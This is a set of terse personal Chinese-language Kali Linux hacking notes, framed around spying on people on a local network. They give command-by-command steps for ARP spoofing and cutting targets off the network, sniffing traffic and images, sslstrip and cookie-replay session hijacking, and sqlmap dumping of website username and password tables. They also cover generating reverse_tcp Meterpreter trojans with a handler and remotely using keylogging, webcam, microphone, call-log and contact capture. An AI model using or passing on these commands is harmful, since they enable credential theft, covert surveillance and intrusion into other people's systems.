ail 入侵入门
- KDE 桌面安装 apt-get install kde-full
- apt-get -f install kalgebra kde-runtime phonon
- apt-get -f install python-kde4 kdepim-runtime akonadi-server
- apt-get -f install kdemultimedia juk libtag1c2a
- apt-get -f install libqt4-sql=4:4.8.2+dfsg-11 libqtcore4=4:4.8.2+dfsg-11
- sqlmap 明小子
- ettercap 欺骗工具
- 局域网断网攻击。
- arpspoof -i 网卡 -t 目标 IP 网关
- fping -asp 192.168.1.0/24
- 获取内网妹子相册
- arp欺骗 目标流量会经过我的网卡,会通过网关出去
- arp断网 目标流量会经过我的网卡
- 进行ip 流量转发 echo 1>/proc/sys/ipv4/ip_forward
- drifnet -i 网卡
- 综合应用HTTP 账号密码获取
- ettercap => DNS 欺骗 流量嗅探
- ettercap -Tq -i eth0
- -T 文本 -q安静模式。
- 获取HTTPS 账号密码
- sslstrip -sfk 破解https
- 会话劫持
- arpspoof arg欺骗
- wrieshark 抓包
- ferret 重新生成抓包工具
- hamster 重放流量
- ferret -r cookie
- hasmster 重放流量改代理。
- 没有ferret 安装教程
- git clone https://github.com/oulyong/ferret
- mkdir bin tmp
- vim src/ pixie.c
- 注释679 701
- make
- asp 网站 大多数使用access
- asp MSSQL
- sqlmap -u “网站名” 查看是否存在sql漏洞
- sqlmap -u “网站名”--tables 拆解所有表名
- sqlmap -u “网站名”--colums -T "表名" 通过表名找列项
- sqlmap -u “网站名" --dump - C "username,password" -T "表名" 下载数据
- php 网站
- sqlmap -u "网站名" --is-dba 是不是dba
- sqlmap -u "网站名" --dbs 列出所有数据库
- sqlmap -u "网站名" --current-db 列出当前数据库
- sqlmap -u "网站名" --tables -D "数据库名字" 列出当前数据库数据表
- sqlmap -u "网站名" --colums -T "表名" -D "数据库名字" 找数据列
- cookie 注入
- sqlmap -u "网站名" --cookie " "
- Metasloit 教程
- csfconsle
- exploit 模块 漏洞利用
- payloads shellcode 漏洞利用后执行代码
- use 模块
- show options
- 木马程序: 控制端 -- 服务端
控制远程 木马程序
- 根据自己 ip 生成木马
- msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555 X > test.exe
- use exploit/multi/handler 使用handler这个模块
- set PAYLOAD windows/meterpreter/reverse_tcp
- 使用这个shellcode
- backgroud 后台
- sessions -i id 启动哪个会话。
- 注入 pid 进程
- migrate XXX 注入id 下面那个pid
- 7564 7520 explorer.exe 桌面进程
- run vnc 开启远程桌面
- 文件管理功能
这里我说一下 自从 2015年起kail 取消了payload 因为不免杀,所以更新了新结合工具。
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
- download Download a file or directory
- upload Upload a file or directory
- arp arp表
- enumdesktops List all accessible desktops and window stations 窗体列表
- keyscan_dump Dump the keystroke buffer 键盘记录下载
- keyscan_start Start capturing keystrokes 键盘记录
- keyscan_stop Stop capturing keystrokes
- screenshot Grab a screenshot of the interactive desktop 截屏
- uictl Control some of the user interface components 获取鼠标键盘控制权
- Stdapi: Webcam Commands
- =======================
- Command Description
- ------- -----------
- record_mic Record audio from the default microphone for X seconds 音频录制
- webcam_chat Start a video chat 开启视频
- webcam_list List webcams 列举摄像头
- webcam_snap Take a snapshot from the specified webcam 使用摄像头拍照
- webcam_stream Play a video stream from the specified webcam 网页视频
- check_root 检测ROOT
- dump_calllog 下载电话记录
- dump_contacts 下载信息记录
- Geolocate 定位
- MS12 020 漏洞。
- auxiliary/scanner/rdp/ms12_020_check
- auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- PHP
- msfpayload php/meterpreter/reverse_tcp LHOST=192.168.199.209 R > web.php
不定时更新,笔记只有我能看懂,